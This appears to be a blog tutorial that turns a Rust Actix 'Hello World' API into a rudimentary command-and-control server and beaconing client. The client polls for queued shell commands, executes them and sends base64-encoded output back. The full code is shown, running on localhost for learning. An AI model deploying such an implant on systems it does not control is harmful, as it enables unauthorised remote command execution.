From Hello World API to Simple Command and Control Server
In a previous blog I wrote about learning a new language by creating a “Hello World” API server. In this blog, I plan to take that a step further and turn that Rust API into the start of a Command-and-Control server.
Initial Setup
To generate the initial directory structure, run cargo init callback; this creates the directory where the project will be built. Once created, src/main.rs can be removed since this project will be using a src/client.rs and a src/server.rs file instead. A Makefile will also be created within the main directory so the code can be compiled using make and the project folder can be cleaned up using make clean. This also opens up the option to implement cross-compiling as a make build target in the future if desired. That should give us the directory structure below.
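Concretely, the setup steps just described look roughly like this (a sketch; file names match the structure below):

$ cargo init callback
$ cd callback
$ rm src/main.rs
$ touch src/server.rs src/client.rs Makefile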
Directory Structure:
callback
├── Cargo.toml
├── Makefile
└── src
    ├── server.rs
    └── client.rs
With the directory structure created from the cargo command, the next step is to update the Cargo.toml with the dependencies and declarations for compiling the Rust source code into two separate binaries.
Cargo.toml
[package]
name = "callback"
version = "0.1.0"
edition = "2021"

[dependencies]
clap = { version = "4.5.4", features = ["derive"] }
actix-web = "4"
serde = { version = "1.0", features = ["derive"] }
# the server and client code below also rely on these crates
# (versions here are assumptions; adjust as needed)
env_logger = "0.11"
reqwest = { version = "0.12", features = ["json"] }
tokio = { version = "1", features = ["full"] }

[[bin]]
name = "server"
path = "src/server.rs"

[[bin]]
name = "client"
path = "src/client.rs"
The next update will add some commands into the Makefile so that we can use make build and make clean in order to build the project and clean up the directory to its original form prior to a build.
Makefile
build:
	cargo build --release

clean:
	cargo clean
	rm Cargo.lock

all: build
The final change is to add code to both the server and client files to give us a starting point using a Hello World API. Once compiled, that will generate a server binary to start up the API server and a client binary to make requests to that server.
server.rs
use clap::Parser;
use actix_web::{get, post, App, HttpServer, web, middleware::Logger, Responder, Result};
use serde::Serialize;
use serde::Deserialize;
use env_logger::Env;

#[derive(Parser, Debug)]
#[command(arg_required_else_help(true))]
struct Args {
    #[clap(short, long)]
    port: u16,
}

#[derive(Serialize)]
struct MyObj {
    name: String,
}

#[derive(Deserialize)]
struct Info {
    name: String,
}

#[get("/{name}")]
async fn index(name: web::Path<String>) -> Result<impl Responder> {
    let obj = MyObj {
        name: name.to_string(),
    };
    Ok(web::Json(obj))
}

#[post("/hello")]
async fn echo(info: web::Json<Info>) -> Result<String> {
    Ok(format!("Welcome {}!", info.name))
}

#[actix_web::main]
async fn main() -> std::io::Result<()> {
    // imports arguments
    let args = Args::parse();

    env_logger::init_from_env(Env::default().default_filter_or("info"));
    HttpServer::new(|| App::new()
        .service(index)
        .service(echo)
        .wrap(Logger::default()))
        .bind(("127.0.0.1", args.port))?
        .run()
        .await
}
client.rs
use clap::Parser;
use reqwest::Error;

#[derive(Parser, Debug)]
#[command(arg_required_else_help(true))]
struct Args {
    #[clap(short, long)]
    method: String,

    #[clap(short, long)]
    url: String,
}

async fn get_request(url: String) -> Result<(), Error> {
    let response = reqwest::get(url + "/rust").await?;
    println!("Status: {}", response.status());

    let body = response.text().await?;
    println!("Body:\n{}", body);

    Ok(())
}

async fn post_request(url: String) -> Result<(), Error> {
    let client = reqwest::Client::new();

    let response = client
        .post(url + "/hello")
        .header("Content-Type", "application/json")
        .body(r#"{"name":"test-post"}"#)
        .send()
        .await?;

    println!("Status: {}", response.status());

    let body = response.text().await?;
    println!("Body:\n{}", body);

    Ok(())
}

#[tokio::main]
async fn main() -> Result<(), Error> {
    let args = Args::parse();
    if args.method == "get" {
        get_request(args.url).await?;
    } else if args.method == "post" {
        post_request(args.url).await?;
    }

    Ok(())
}
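Once built with make, the two binaries land in target/release and can be exercised directly; for example (host and port here are just the values used throughout this post):

$ ./target/release/server -p 8080
$ ./target/release/client --method get --url http://127.0.0.1:8080
$ ./target/release/client --method post --url http://127.0.0.1:8080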
Setting up the client to phone home
The first modification that we need to make is to have the client continuously call back to the server at set intervals. For simplicity, we will just have it invoke the hello world API and pass a path parameter. In this case, we will reuse the GET request to /rust and have it repeat in 10 second intervals using sleep. Documentation for sleep, which the delay code below is based on, can be found here:
https://doc.rust-lang.org/std/thread/fn.sleep.html
For the delay, I added the following two functions: one to create a general delay, and an async version intended to sleep the callback thread.
// function to set a custom delay
fn delay(seconds: u64) {
    let ten_seconds = time::Duration::from_secs(seconds);
    let now = time::Instant::now();

    thread::sleep(ten_seconds);

    assert!(now.elapsed() >= ten_seconds);
}

// function to set a custom delay within a thread
fn async_delay(seconds: u64) {
    let ten_seconds = time::Duration::from_secs(seconds);
    let now = time::Instant::now();

    thread::sleep(ten_seconds);

    assert!(now.elapsed() >= ten_seconds);
}
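As an aside, both helpers above block the current thread with thread::sleep. Since the client already runs on the tokio runtime, a truly non-blocking delay could instead use tokio's timer; a minimal sketch of that alternative (not used in this post, and assuming tokio's time feature is enabled) would be:

// hypothetical non-blocking alternative using tokio's timer
async fn tokio_delay(seconds: u64) {
    tokio::time::sleep(std::time::Duration::from_secs(seconds)).await;
}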
Since I am only planning to test the one GET, I also updated main to create an infinite loop using the loop keyword in Rust, targeting localhost on port 8080. Because the url variable lives outside of the loop, it also needs to be cloned each time the string is passed into the function.
#[tokio::main]
async fn main() -> Result<(), Error> {
    let url = String::from("http://localhost:8080");
    loop {
        get_request(url.clone()).await?;
        async_delay(10);
    }
}
Along with the updates to the main function above, I will also be reducing the initial client code down to just the minimum parts needed.
client.rs
use reqwest::Error;
use std::{thread, time};

async fn get_request(url: String) -> Result<(), Error> {
    let response = reqwest::get(url.clone() + "/rust").await?;
    println!("Status: {}", response.status());

    let body = response.text().await?;
    println!("Body:\n{}", body);

    Ok(())
}

async fn post_request(url: String) -> Result<(), Error> {
    let client = reqwest::Client::new();

    let response = client
        .post(url.clone() + "/hello")
        .header("Content-Type", "application/json")
        .body(r#"{"name":"test-post"}"#)
        .send()
        .await?;

    println!("Status: {}", response.status());

    let body = response.text().await?;
    println!("Body:\n{}", body);

    Ok(())
}

// function to set a custom delay
fn delay(seconds: u64) {
    let ten_seconds = time::Duration::from_secs(seconds);
    let now = time::Instant::now();

    thread::sleep(ten_seconds);

    assert!(now.elapsed() >= ten_seconds);
}

// function to set a custom delay within a thread
fn async_delay(seconds: u64) {
    let ten_seconds = time::Duration::from_secs(seconds);
    let now = time::Instant::now();

    thread::sleep(ten_seconds);

    assert!(now.elapsed() >= ten_seconds);
}

#[tokio::main]
async fn main() -> Result<(), Error> {
    let url = String::from("http://127.0.0.1:8080");
    loop {
        get_request(url.clone()).await?;
        async_delay(10);
    }
}
After rebuilding the code using make, the server's command line output should look like the output below once the client is running, with the server receiving a request every 10 seconds. Something to note: although the code is set to call back every 10 seconds, you may see an extra 1-2 second delay as the client executes API requests in later updates to the code, or when testing commands that take a while to process. This will show up more and more as we add code to the loop.
$ ./server -p 8080
[2024-09-04T02:00:43Z INFO actix_server::builder] starting 8 workers
[2024-09-04T02:00:43Z INFO actix_server::server] Actix runtime found; starting in Actix runtime
[2024-09-04T02:01:14Z INFO actix_web::middleware::logger] 127.0.0.1 "GET /rust HTTP/1.1" 200 15 "-" "-" 0.000082
[2024-09-04T02:01:24Z INFO actix_web::middleware::logger] 127.0.0.1 "GET /rust HTTP/1.1" 200 15 "-" "-" 0.000098
[2024-09-04T02:01:34Z INFO actix_web::middleware::logger] 127.0.0.1 "GET /rust HTTP/1.1" 200 15 "-" "-" 0.000101
Adding in Command Execution
Now that the delay is working, the next step is to add in command execution. For that I will be using the Command structure along with a few status checks:
// executes shell commands for windows or mac/linux
fn cmdexec(cmd: &str) -> String {
    let results = if cfg!(target_os = "windows") {
        Command::new("cmd")
            .args(["/C", cmd])
            .output()
            .expect("failed to execute process")
    } else {
        Command::new("sh")
            .arg("-c")
            .arg(cmd)
            .output()
            .expect("failed to execute process")
    };

    // checks the status of the executed command
    println!("status: {} \n", results.status);

    // print the output of the command
    let output = String::from_utf8_lossy(&results.stdout).into_owned();
    println!("output: \n{}", output);
    return output;
}
Status codes vary depending on the command executed, but one constant between Windows and Linux is that a status of 0 usually means the command executed successfully. For those who want to dig deeper, the following two links are a good starting point for understanding potential status codes.
Linux: https://itsfoss.com/linux-exit-codes/
Windows: https://learn.microsoft.com/en-us/windows/win32/debug/system-error-codes
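As a small illustration (not part of the client code), the ExitStatus returned by Command can also be inspected programmatically rather than just printed; a minimal Unix-flavored sketch:

use std::process::Command;

// minimal sketch: inspecting an ExitStatus programmatically
fn check_exit_status() {
    let result = Command::new("sh")
        .arg("-c")
        .arg("exit 3")
        .output()
        .expect("failed to execute process");

    // success() is true only when the exit code is 0
    println!("succeeded: {}", result.status.success());
    // code() returns Some(exit code), or None if the process was killed by a signal
    println!("code: {:?}", result.status.code());
}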
We will also modify main again to run a single command, echo test:
#[tokio::main]
async fn main() -> Result<(), Error> {
    let url = String::from("http://localhost:8080");
    loop {
        get_request(url.clone()).await?;
        cmdexec("echo test");
        async_delay(10);
    }
}
Below is the new updated code for client.rs:
client.rs
use reqwest::Error;
use std::{thread, time};
use std::process::Command;

async fn get_request(url: String) -> Result<(), Error> {
    let response = reqwest::get(url.clone() + "/rust").await?;
    println!("Status: {}", response.status());

    let body = response.text().await?;
    println!("Body:\n{}", body);

    Ok(())
}

async fn post_request(url: String) -> Result<(), Error> {
    let client = reqwest::Client::new();

    let response = client
        .post(url + "/hello")
        .header("Content-Type", "application/json")
        .body(r#"{"name":"test-post"}"#)
        .send()
        .await?;

    println!("Status: {}", response.status());

    let body = response.text().await?;
    println!("Body:\n{}", body);

    Ok(())
}

// function to set a custom delay
fn delay(seconds: u64) {
    let ten_seconds = time::Duration::from_secs(seconds);
    let now = time::Instant::now();

    thread::sleep(ten_seconds);

    assert!(now.elapsed() >= ten_seconds);
}

// function to set a custom delay within a thread
fn async_delay(seconds: u64) {
    let ten_seconds = time::Duration::from_secs(seconds);
    let now = time::Instant::now();

    thread::sleep(ten_seconds);

    assert!(now.elapsed() >= ten_seconds);
}

// executes shell commands for windows or mac/linux
fn cmdexec(cmd: &str) -> String {
    let results = if cfg!(target_os = "windows") {
        Command::new("cmd")
            .args(["/C", cmd])
            .output()
            .expect("failed to execute process")
    } else {
        Command::new("sh")
            .arg("-c")
            .arg(cmd)
            .output()
            .expect("failed to execute process")
    };

    // checks the status of the command
    println!("status: {} \n", results.status);

    // prints the output from the command
    let output = String::from_utf8_lossy(&results.stdout).into_owned();
    println!("output: \n{}", output);
    return output;
}

#[tokio::main]
async fn main() -> Result<(), Error> {
    let url = String::from("http://localhost:8080");
    loop {
        get_request(url.clone()).await?;
        cmdexec("echo test");
        async_delay(10);
    }
}
After recompiling and executing the client, it continues to send the delayed requests, each followed by our command executing. On Linux, the command returns a status of 0, showing a successful execution.
Status: 200 OK
Body:
{"name":"rust"}
status: exit status: 0

output:
test
With a successful command execution, the next step is to update the API server to receive the results of those commands. To do that, modify the post_request function within client.rs to the following:
async fn post_request(url: String) -> Result<(), Error> {
    let client = reqwest::Client::new();

    let response = client
        .post(url + "/hello")
        .header("Content-Type", "application/json")
        .body(r#"{"name":"test-post"}"#)
        .send()
        .await?;

    println!("Status: {}", response.status());

    let body = response.text().await?;
    println!("Body:\n{}", body);

    Ok(())
}
The following change was also made to the server.rs file so that we can print out the sent data:
#[post("/hello")] async fn echo(info: web::Json<Info>) -> Result<String> { println!("output: \n{}",info.name); Ok(format!("Welcome {}!", info.name)) }
|
After recompiling and executing our code, this should result in a client response as follows:
$ ./client
Status: 200 OK
Body:
Welcome test-post!
status: exit status: 127

output:
On the server we should see the following output showing the test-post string as output:
$ ./server -p 8080
[2024-09-04T03:18:25Z INFO actix_server::builder] starting 8 workers
[2024-09-04T03:18:25Z INFO actix_server::server] Actix runtime found; starting in Actix runtime
output:
test-post
With the output now being printed back to our server, we can continue to modify our code to receive the outputs of our commands. Since the cmdexec function returns command output as a string, we will modify it further to return that output base64-encoded, using the base64 crate to preserve the integrity of the command output being sent back to the web server.
For those jumping into this blog who are unfamiliar with Rust, crates are the equivalent of libraries that you can import to add functionality to your projects. This will require a couple of updates. One is adding base64 = "0.22.1" to the dependencies section of Cargo.toml. Additionally, since base64 encoding will be used by both the client and the server, the following import will be added to the top of both client.rs and server.rs:

use base64::prelude::*;
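For anyone who has not used the crate before, a minimal round trip with the prelude's BASE64_STANDARD engine looks roughly like this (a standalone sketch, not part of the project code):

use base64::prelude::*;

// standalone sketch: encode a string and decode it again with BASE64_STANDARD
fn base64_round_trip() {
    let encoded = BASE64_STANDARD.encode("test".as_bytes());
    let decoded = BASE64_STANDARD.decode(encoded.as_bytes()).unwrap();
    println!("{} -> {}", encoded, String::from_utf8_lossy(&decoded));
}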
With the use declaration added to both the client and server, the client's cmdexec function will be modified to base64-encode the command output before it is sent back as part of the existing post request. Later on, we will be sending the error code and the base64 output to the web server. To accomplish this, I modified the function to return two string values. The new cmdexec should now look like this, returning two results:
// executes shell commands for windows or mac/linux
fn cmdexec(cmd: &str) -> (String, String) {
    let results = if cfg!(target_os = "windows") {
        Command::new("cmd")
            .args(["/C", cmd])
            .output()
            .expect("failed to execute process")
    } else {
        Command::new("sh")
            .arg("-c")
            .arg(cmd)
            .output()
            .expect("failed to execute process")
    };

    // checks the status of the command
    let exec_code = results.status;

    // captures the output from the command
    let results = String::from_utf8_lossy(&results.stdout).into_owned();
    // base64 encodes the command output
    let output = BASE64_STANDARD.encode(results.as_bytes());
    //println!("output: \n{}",output);
    return (output, exec_code.to_string());
}
To verify this worked as expected I then modified the main function to print out these values:
#[tokio::main]
async fn main() -> Result<(), Error> {
    let url = String::from("http://localhost:8080");
    loop {
        post_request(url.clone()).await?;
        let (data, status) = cmdexec("echo test");
        println!("status: {}\noutput: {}", status, data);
        async_delay(10);
    }
}
After another recompile, this resulted in both the status and the command output being printed client side:
$ ./client
Status: 200 OK
Body:
Welcome test-post!
status: exit status: 0
output: dGVzdAo=
All that is left now is to modify both files: post_request within client.rs to send our data to the server, and server.rs to process and output those results. I started with the server by modifying the Info structure to the following:
#[derive(Deserialize)]
struct Info {
    status: String,
    data: String,
}
I then modified the /hello POST handler to return a simple Ok rather than echoing data back, and to print out the results it receives; base64 decoding of the results sent by the client will be added shortly.
#[post("/hello")] async fn echo(info: web::Json<Info>) -> Result<String> { println!("status: {}\noutput:\n{}",info.status, info.data); Ok(("Ok").to_string()) }
|
Within client.rs I ended up adding the following changes to post_request. To make it easier to read I created the post body as a separate variable in case I needed to troubleshoot the formatting. This came in handy because I could verify that the JSON body was formatted correctly.
async fn post_request(url: String, status_code: String, b64_data: String) -> Result<(), Error> {
    let client = reqwest::Client::new();

    // build post body
    let post_data = format!(r#"{{"status":"{}","data":"{}"}}"#, status_code, b64_data);
    // send post request to server
    let response = client
        .post(url + "/hello")
        .header("Content-Type", "application/json")
        .body(post_data)
        .send()
        .await?;

    println!("Status: {}", response.status());

    let body = response.text().await?;
    println!("Body:\n{}", body);

    Ok(())
}
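As a side note, an alternative to hand-building the JSON string (not used in this post, and requiring an additional serde_json dependency) would be to derive Serialize on a small struct and let serde_json produce the body:

use serde::Serialize;

// hypothetical alternative: let serde_json build the POST body
#[derive(Serialize)]
struct Report {
    status: String,
    data: String,
}

fn build_body(status: String, data: String) -> String {
    serde_json::to_string(&Report { status, data }).expect("failed to serialize body")
}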
I also had to re-organize main so that the variables needed for the post request are created prior to sending the post body to the server.
#[tokio::main]
async fn main() -> Result<(), Error> {
    let url = String::from("http://localhost:8080");
    loop {
        let (data, status) = cmdexec("echo test");
        post_request(url.clone(), status, data).await?;
        async_delay(10);
    }
}
Now that the command results are being encoded and sent to the server, that leaves the task of decoding the base64 and displaying the output. This is done by modifying the echo function, which handles the pre-existing hello world API.
#[post("/hello")] async fn echo(info: web::Json<Info>) -> Result<String> { // decodes the base64 results let bytes = BASE64_STANDARD.decode(info.data.as_bytes()).unwrap(); let output = str::from_utf8(&bytes).unwrap(); // prints the output and returns the works OK back to the client println!("status: {}\noutput:\n{}",info.status, output); Ok(("Ok").to_string()) }
|
Another change I made was to swap out the echo test command for a command that returns multiple lines, in this case nslookup google.com 8.8.8.8. After recompiling and executing both the client and the server, we should now see the following output from our web server:
[2024-09-04T13:06:06Z INFO actix_web::middleware::logger] 127.0.0.1 "POST /hello HTTP/1.1" 200 2 "-" "-" 0.000060
status: exit status: 0
output:
Server:   8.8.8.8
Address:  8.8.8.8#53

Non-authoritative answer:
Name:     google.com
Address:  142.250.190.142
Name:     google.com
Address:  2607:f8b0:4009:81a::200e
Feeding in custom commands
Now that the application is returning the output of executed commands back to the web server, the next step is to set up a few additional APIs to send custom commands. To do this, a new structure will first need to be created to send and receive those commands:
#[derive(Serialize, Deserialize)]
struct Jobs {
    job: String,
}
The next step is to create the new API calls to send and retrieve those instructions through a jobs API. Before that, a struct will need to be created to hold the commands we send to the server; we'll call this Tasks. Since this object will be mutable and shared across the Actix worker threads, I also added an additional use declaration for std::sync::Mutex so that we can create a mutable string for the commands that will be submitted to the web server.
use std::sync::Mutex;

struct Tasks {
    pub task: Mutex<String>,
}
An instance of that struct will also be created in main so that it can be added as app_data to the Actix web server, as shown in the code below, along with two new services, check_job and set_job, which will be used when creating the job API calls:
// initializes the Tasks structure
let jobs = web::Data::new(Tasks {
    task: Mutex::new("None".to_string()),
});
// sets up the actix server
HttpServer::new(move || App::new()
    .app_data(jobs.clone())
    .service(check_job)
    .service(set_job)
    .service(echo)
    .wrap(Logger::default()))
    .bind(("127.0.0.1", args.port))?
    .run()
    .await
With all the declarations set up, that leaves us with the task of creating a new GET request with the path /job. The new Tasks object will need to be referenced in the function declaration so that we can view and modify its value. In the code below, the function was set up to return the value stored in the Tasks object using the Jobs structure created previously. Additionally, since I will be using GET requests to retrieve those commands, I also set the value back to None once a command is requested. This helps when verifying that the client is working as intended, but it also locks things down to just a single client for now.
// get command
#[get("/job")]
async fn check_job(data: web::Data<Tasks>) -> Result<impl Responder> {
    // creates json object for the job
    let job = Jobs {
        job: data.task.lock().unwrap().to_string(),
    };

    // resets job back to None
    let mut new_job = data.task.lock().unwrap();
    *new_job = "None".to_string();

    Ok(web::Json(job))
}
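As a small aside, the two separate lock() calls above could also be collapsed into a single lock; a functionally equivalent sketch (not the version used in this post) might look like:

// hypothetical variant: take the lock once and swap the value in place
#[get("/job")]
async fn check_job(data: web::Data<Tasks>) -> Result<impl Responder> {
    let mut task = data.task.lock().unwrap();
    let job = Jobs { job: task.clone() };
    *task = "None".to_string();
    Ok(web::Json(job))
}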
For the POST request portion, I made a very similar function to set the new command as a job within the structure.
// set command
#[post("/job")]
async fn set_job(jobs: web::Json<Jobs>, data: web::Data<Tasks>) -> Result<String> {
    // prints the submitted job and returns the word OK back to the client
    println!("job: {}", jobs.job);
    // stores the new job in the shared Tasks structure
    let mut new_job = data.task.lock().unwrap();
    *new_job = jobs.job.to_string();
    Ok(("Ok").to_string())
}
After cleaning up the code this leaves a server.rs file that looks like this:
server.rs
use clap::Parser;
use actix_web::{get, post, App, HttpServer, web, middleware::Logger, Responder, Result};
use serde::{Serialize, Deserialize};
use std::sync::Mutex;
use env_logger::Env;
use base64::prelude::*;
use std::str;

#[derive(Parser, Debug)]
#[command(arg_required_else_help(true))]
struct Args {
    #[clap(short, long)]
    port: u16,
}

#[derive(Deserialize)]
struct Info {
    status: String,
    data: String,
}

#[derive(Serialize, Deserialize)]
struct Jobs {
    job: String,
}

struct Tasks {
    pub task: Mutex<String>,
}

#[post("/hello")]
async fn echo(info: web::Json<Info>) -> Result<String> {
    // decodes the base64 results
    let bytes = BASE64_STANDARD.decode(info.data.as_bytes()).unwrap();
    let output = str::from_utf8(&bytes).unwrap();
    // prints the output and returns the word OK back to the client
    println!("status: {}\noutput:\n{}", info.status, output);
    Ok(("Ok").to_string())
}

// get command
#[get("/job")]
async fn check_job(data: web::Data<Tasks>) -> Result<impl Responder> {
    // creates json object for the job
    let job = Jobs {
        job: data.task.lock().unwrap().to_string(),
    };

    // resets job back to None
    let mut new_job = data.task.lock().unwrap();
    *new_job = "None".to_string();

    Ok(web::Json(job))
}

// set command
#[post("/job")]
async fn set_job(jobs: web::Json<Jobs>, data: web::Data<Tasks>) -> Result<String> {
    // prints the submitted job and returns the word OK back to the client
    println!("job: {}", jobs.job);
    // stores the new job in the shared Tasks structure
    let mut new_job = data.task.lock().unwrap();
    *new_job = jobs.job.to_string();
    Ok(("Ok").to_string())
}

#[actix_web::main]
async fn main() -> std::io::Result<()> {
    // imports arguments
    let args = Args::parse();

    // sets up logging
    env_logger::init_from_env(Env::default().default_filter_or("info"));
    // initializes the Tasks structure
    let jobs = web::Data::new(Tasks {
        task: Mutex::new("None".to_string()),
    });
    // sets up the actix server
    HttpServer::new(move || App::new()
        .app_data(jobs.clone())
        .service(check_job)
        .service(set_job)
        .service(echo)
        .wrap(Logger::default()))
        .bind(("127.0.0.1", args.port))?
        .run()
        .await
}
The final step is to set the client to read the command, execute it, and return the results to the server. First, we will update the get_request function to pull in a command and process it. This will take a few changes, since the code will also need to accept a JSON body. I based the new function on the example from the reqwest documentation page here:
https://docs.rs/reqwest/latest/reqwest/struct.Response.html#method.json
The above example resulted in code that looked like this, replacing the current get_request.
use serde::Deserialize;

#[derive(Deserialize)]
struct Jobs {
    job: String,
}

async fn get_request(url: String) -> Result<(), Error> {
    let response = reqwest::get(url + "/job")
        .await?
        .json::<Jobs>()
        .await?;
    println!("Body:\n{}", response.job);
    Ok(())
}
At this point, let’s make sure the code is working as intended. To do that I ran the command below to populate the server with a command before running the client again.
curl -X POST -H "content-type: application/json" --data '{"job":"nslookup google.com 8.8.8.8"}' 127.0.0.1:8080/job
After running the client, it should now show the command that was sent, followed by None once the command has been reset:
Body:
nslookup google.com 8.8.8.8
Body:
None
With the code outputting the correct values, we can add in the next request to process the command. For that, I took the post request code previously removed from the main loop and added it back into the get_request function, along with some logic to do nothing if the value is set to None. This is also where the general delay function comes in: the loop keeps querying the API, and the thread only sleeps before executing the command and sending its output back to the server.
async fn get_request(url: String) -> Result<(), Error> {
    let response = reqwest::get(url.clone() + "/job")
        .await?
        .json::<Jobs>()
        .await?;

    // delay before sending and executing the code
    delay(5);
    // checking if value is None before executing
    if response.job.as_str() != "None" {
        let (data, status) = cmdexec(response.job.as_str());
        post_request(url, status, data).await?;
    }

    Ok(())
}
The client.rs should now look like the following. I also removed the extra print statements from the post_request function now that the code is working as expected.
client.rs
use reqwest::Error;
use serde::Deserialize;
use std::{thread, time};
use std::process::Command;
use base64::prelude::*;

#[derive(Deserialize)]
struct Jobs {
    job: String,
}

async fn get_request(url: String) -> Result<(), Error> {
    let response = reqwest::get(url.clone() + "/job")
        .await?
        .json::<Jobs>()
        .await?;

    // delay before sending and executing the code
    delay(5);

    // checking if value is None before executing
    if response.job.as_str() != "None" {
        let (data, status) = cmdexec(response.job.as_str());
        post_request(url, status, data).await?;
    }

    Ok(())
}

async fn post_request(url: String, status_code: String, b64_data: String) -> Result<(), Error> {
    let client = reqwest::Client::new();

    // build post body
    let post_data = format!(r#"{{"status":"{}","data":"{}"}}"#, status_code, b64_data);
    // send post request to server
    client.post(url + "/hello")
        .header("Content-Type", "application/json")
        .body(post_data)
        .send()
        .await?;

    Ok(())
}

// function to set a custom delay
fn delay(seconds: u64) {
    let ten_seconds = time::Duration::from_secs(seconds);
    let now = time::Instant::now();

    thread::sleep(ten_seconds);

    assert!(now.elapsed() >= ten_seconds);
}

// function to set a custom delay within a thread
fn async_delay(seconds: u64) {
    let ten_seconds = time::Duration::from_secs(seconds);
    let now = time::Instant::now();

    thread::sleep(ten_seconds);

    assert!(now.elapsed() >= ten_seconds);
}

// executes shell commands for windows or mac/linux
fn cmdexec(cmd: &str) -> (String, String) {
    let results = if cfg!(target_os = "windows") {
        Command::new("cmd")
            .args(["/C", cmd])
            .output()
            .expect("failed to execute process")
    } else {
        Command::new("sh")
            .arg("-c")
            .arg(cmd)
            .output()
            .expect("failed to execute process")
    };

    // checks the status of the command
    let exec_code = results.status;

    // captures the output from the command
    let results = String::from_utf8_lossy(&results.stdout).into_owned();
    // base64 encodes the command output
    let output = BASE64_STANDARD.encode(results.as_bytes());
    //println!("output: \n{}",output);
    return (output, exec_code.to_string());
}

#[tokio::main]
async fn main() -> Result<(), Error> {
    let url = String::from("http://localhost:8080");
    loop {
        get_request(url.clone()).await?;
        delay(10);
    }
}
Assuming the command was sent with the curl request mentioned above, we should now see output on the server receiving the command and outputting the response from the command executed:
[2024-09-16T03:24:49Z INFO actix_web::middleware::logger] 127.0.0.1 "GET /job HTTP/1.1" 200 14 "-" "-" 0.000029
job: nslookup google.com 8.8.8.8
[2024-09-16T03:25:04Z INFO actix_web::middleware::logger] 127.0.0.1 "POST /job HTTP/1.1" 200 2 "-" "curl/8.9.1" 0.000079
[2024-09-16T03:25:04Z INFO actix_web::middleware::logger] 127.0.0.1 "GET /job HTTP/1.1" 200 37 "-" "-" 0.000029
status: exit status: 0
output:
Server:   8.8.8.8
Address:  8.8.8.8#53

Non-authoritative answer:
Name:     google.com
Address:  142.250.191.238
Name:     google.com
Address:  2607:f8b0:4009:801::200e
Final Thoughts
Overall, I found it a fun experience turning a Hello World API into a means of passing commands to a client application, and good practice in learning how things are done in Rust. This project covered how to execute commands, how to use error codes to validate potential issues with executed commands, and how to store data in Actix so it can be referenced across multiple threads using app_data. There is still a lot left to do before this code is ready to be used outside of a test environment, but it is a starting point to go further. For now, I will save that for a future blog post. Have fun coding out there!